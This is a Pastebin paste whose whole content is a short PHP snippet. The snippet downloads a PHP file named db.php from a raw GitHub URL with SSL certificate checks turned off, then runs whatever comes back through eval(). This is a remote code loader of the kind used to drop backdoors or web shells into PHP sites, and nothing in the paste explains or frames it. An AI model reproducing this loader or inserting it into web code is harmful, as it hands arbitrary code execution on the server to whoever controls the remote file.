Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_URL, "https://raw.githubusercontent.com/rotinabox/requests/main/db.php");
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
- curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
- $resp = curl_exec($curl);
- curl_close($curl);
- eval($resp);
Add Comment
Please, Sign In to add comment